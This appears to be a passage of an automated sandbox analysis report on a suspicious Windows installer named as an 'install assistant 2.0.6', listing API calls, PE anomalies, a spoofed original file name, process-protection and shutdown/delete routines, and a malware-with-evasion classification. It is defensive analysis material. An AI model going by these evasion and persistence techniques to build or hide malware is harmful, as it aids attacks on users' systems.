Source: #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1558338972.000000006CE08000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1552267523.00000000041E5000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1558338972.000000006CE08000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1552267523.00000000041E5000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr	String found in binary or memory: http://ocsp.digicert.com0H
Source: #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1558338972.000000006CE08000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1552267523.00000000041E5000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1558338972.000000006CE08000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1552267523.00000000041E5000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1558338972.000000006CE08000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1552267523.00000000041E5000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1558338972.000000006CE08000.00000008.00000001.01000000.00000009.sdmp, #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000002.1552267523.00000000041E5000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U52a9#U624b2.0.6.exe	String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U52a9#U624b2.0.6.exe, 00000000.00000003.1375401020.000000007ED5B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.6.exe, 00000000.00000003.1374701249.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000002.00000000.1376888852.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000000.1397917138.0000000000E5D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b2.0.6.tmp.0.dr, #U5b89#U88c5#U52a9#U624b2.0.6.tmp.5.dr	String found in binary or memory: https://www.innosetup.com/
Source: #U5b89#U88c5#U52a9#U624b2.0.6.exe, 00000000.00000003.1375401020.000000007ED5B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.6.exe, 00000000.00000003.1374701249.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000002.00000000.1376888852.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b2.0.6.tmp, 00000006.00000000.1397917138.0000000000E5D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b2.0.6.tmp.0.dr, #U5b89#U88c5#U52a9#U624b2.0.6.tmp.5.dr	String found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp

Process information set: 01 00 00 00

Jump to behavior

System Summary

PE file contains section with special chars

Source: update.vac.2.dr	Static PE information: section name: .#.q
Source: hrsw.vbc.6.dr	Static PE information: section name: .#.q
Source: update.vac.6.dr	Static PE information: section name: .#.q

Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CDD5690 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle,	6_2_6CDD5690
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CC53886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,	6_2_6CC53886
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CC53C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,	6_2_6CC53C62
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CC53D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,	6_2_6CC53D62
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CC53D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,	6_2_6CC53D18
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CC539CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread,	6_2_6CC539CF
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CDD62D0 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,	6_2_6CDD62D0
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CC53A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread,	6_2_6CC53A6A

Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp

Code function: 6_2_6CC51950: CreateFileA,DeviceIoControl,CloseHandle,

6_2_6CC51950

Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp

Code function: 6_2_6CC54754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor,

6_2_6CC54754

Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CC54754	6_2_6CC54754
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CC64A27	6_2_6CC64A27
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CDD1DF0	6_2_6CDD1DF0
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CDD6FB3	6_2_6CDD6FB3
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE36CE0	6_2_6CE36CE0
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE86D10	6_2_6CE86D10
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE5AEEF	6_2_6CE5AEEF
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE8EEF0	6_2_6CE8EEF0
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE22EC9	6_2_6CE22EC9
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE08EA1	6_2_6CE08EA1
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE9C8D0	6_2_6CE9C8D0
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE54896	6_2_6CE54896
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE96820	6_2_6CE96820
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE7E810	6_2_6CE7E810
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE08972	6_2_6CE08972
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE98950	6_2_6CE98950
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE9A930	6_2_6CE9A930
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE86900	6_2_6CE86900
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE94AA0	6_2_6CE94AA0
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE60A52	6_2_6CE60A52
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE9EBC0	6_2_6CE9EBC0
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE10BCA	6_2_6CE10BCA
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE7AB90	6_2_6CE7AB90
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE20B66	6_2_6CE20B66
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE8E4D0	6_2_6CE8E4D0
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE684AC	6_2_6CE684AC
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE845D0	6_2_6CE845D0
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE82580	6_2_6CE82580
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE8C580	6_2_6CE8C580
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE72521	6_2_6CE72521
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE98520	6_2_6CE98520
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE9E600	6_2_6CE9E600
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE6C7F3	6_2_6CE6C7F3
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE0C7CF	6_2_6CE0C7CF
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE967A0	6_2_6CE967A0
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE8E0E0	6_2_6CE8E0E0
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE80020	6_2_6CE80020
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE9C2A0	6_2_6CE9C2A0
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE98200	6_2_6CE98200
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE57D43	6_2_6CE57D43
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE83D50	6_2_6CE83D50
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE89E80	6_2_6CE89E80
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE61F11	6_2_6CE61F11
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE7589F	6_2_6CE7589F
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE899F0	6_2_6CE899F0
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE7DAD0	6_2_6CE7DAD0
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE81AA0	6_2_6CE81AA0
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE7FA50	6_2_6CE7FA50
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE2540A	6_2_6CE2540A
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE4F5EC	6_2_6CE4F5EC
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE8F5C0	6_2_6CE8F5C0
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE896E0	6_2_6CE896E0
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE9F640	6_2_6CE9F640
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE7B650	6_2_6CE7B650
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CEA37C0	6_2_6CEA37C0
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE96AF0	6_2_6CE96AF0
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE93750	6_2_6CE93750
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007981EC	10_2_007981EC
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007D81C0	10_2_007D81C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007C4250	10_2_007C4250
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007E8240	10_2_007E8240
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007EC3C0	10_2_007EC3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007E04C8	10_2_007E04C8
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007C8650	10_2_007C8650
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007CC950	10_2_007CC950
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007A0943	10_2_007A0943
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007C8C20	10_2_007C8C20
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007E0E00	10_2_007E0E00
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007E4EA0	10_2_007E4EA0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007B10AC	10_2_007B10AC
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007DD089	10_2_007DD089
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007E1120	10_2_007E1120
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007CD1D0	10_2_007CD1D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007E91C0	10_2_007E91C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007D5180	10_2_007D5180
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007ED2C0	10_2_007ED2C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007B53F3	10_2_007B53F3
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007553CF	10_2_007553CF
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007ED470	10_2_007ED470
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007E54D0	10_2_007E54D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_0079D496	10_2_0079D496
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00751572	10_2_00751572
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007E1550	10_2_007E1550
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007A9652	10_2_007A9652
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007DD6A0	10_2_007DD6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00769766	10_2_00769766
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007597CA	10_2_007597CA
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007ED9E0	10_2_007ED9E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00751AA1	10_2_00751AA1
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007D5E80	10_2_007D5E80
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007D5F80	10_2_007D5F80
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_0076E00A	10_2_0076E00A
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007D22E0	10_2_007D22E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007F2300	10_2_007F2300
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007BE49F	10_2_007BE49F
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007D25F0	10_2_007D25F0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007C66D0	10_2_007C66D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007CA6A0	10_2_007CA6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007EE990	10_2_007EE990
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007D2A80	10_2_007D2A80
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007AAB11	10_2_007AAB11
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007D6CE0	10_2_007D6CE0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007D70D0	10_2_007D70D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007BB121	10_2_007BB121
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007CB180	10_2_007CB180
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007E7200	10_2_007E7200
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_0077B3E4	10_2_0077B3E4
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007EF3C0	10_2_007EF3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007DF3A0	10_2_007DF3A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007DF420	10_2_007DF420
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007C7410	10_2_007C7410
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007E3530	10_2_007E3530
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007F351A	10_2_007F351A
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007CF500	10_2_007CF500
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007EF599	10_2_007EF599
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007F3601	10_2_007F3601
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007E77C0	10_2_007E77C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007C3790	10_2_007C3790
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_0077F8E0	10_2_0077F8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007CF910	10_2_007CF910
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007D7AF0	10_2_007D7AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007A3AEF	10_2_007A3AEF
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_0076BAC9	10_2_0076BAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007D7C50	10_2_007D7C50
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_0076BC92	10_2_0076BC92

Source: C:\Program Files (x86)\Windows NT\7zr.exe

Process token adjusted: Security

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: String function: 6CE09240 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: String function: 6CEA6F10 appears 633 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: String function: 007EFB10 appears 723 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: String function: 007528E3 appears 34 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: String function: 00751E40 appears 125 times

Source: #U5b89#U88c5#U52a9#U624b2.0.6.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b2.0.6.tmp.5.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows

Source: #U5b89#U88c5#U52a9#U624b2.0.6.tmp.5.dr	Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b2.0.6.exe	Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b2.0.6.tmp.0.dr	Static PE information: Number of sections : 11 > 10

Source: #U5b89#U88c5#U52a9#U624b2.0.6.exe, 00000000.00000000.1373065115.0000000000239000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileNameHqNrI09VdzkFeYys.exe vs #U5b89#U88c5#U52a9#U624b2.0.6.exe
Source: #U5b89#U88c5#U52a9#U624b2.0.6.exe, 00000000.00000003.1375401020.000000007F05A000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameHqNrI09VdzkFeYys.exe vs #U5b89#U88c5#U52a9#U624b2.0.6.exe
Source: #U5b89#U88c5#U52a9#U624b2.0.6.exe, 00000000.00000003.1374701249.00000000038EE000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameHqNrI09VdzkFeYys.exe vs #U5b89#U88c5#U52a9#U624b2.0.6.exe
Source: #U5b89#U88c5#U52a9#U624b2.0.6.exe	Binary or memory string: OriginalFileNameHqNrI09VdzkFeYys.exe vs #U5b89#U88c5#U52a9#U624b2.0.6.exe

Source: #U5b89#U88c5#U52a9#U624b2.0.6.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: tProtect.dll.12.dr	Binary string: \Device\TfSysMon
Source: tProtect.dll.12.dr	Binary string: \Device\TfKbMonPWLCache

Source: classification engine

Classification label: mal88.evad.winEXE@144/33@0/0

Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CDD62D0 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,	6_2_6CDD62D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00759313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,	10_2_00759313
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00763D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	10_2_00763D66

Source: C:\Program Files (x86)\Windows NT\7zr.exe

Code function: 10_2_00759252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,

10_2_00759252

Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp

Code function: 6_2_6CDD57B0 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW,

6_2_6CDD57B0

Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp

File created: C:\Program Files (x86)\Windows NT\is-PQ622.tmp

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3004:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7840:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7508:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3316:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7536:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:8156:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3276:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7796:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4292:120:WilError_03
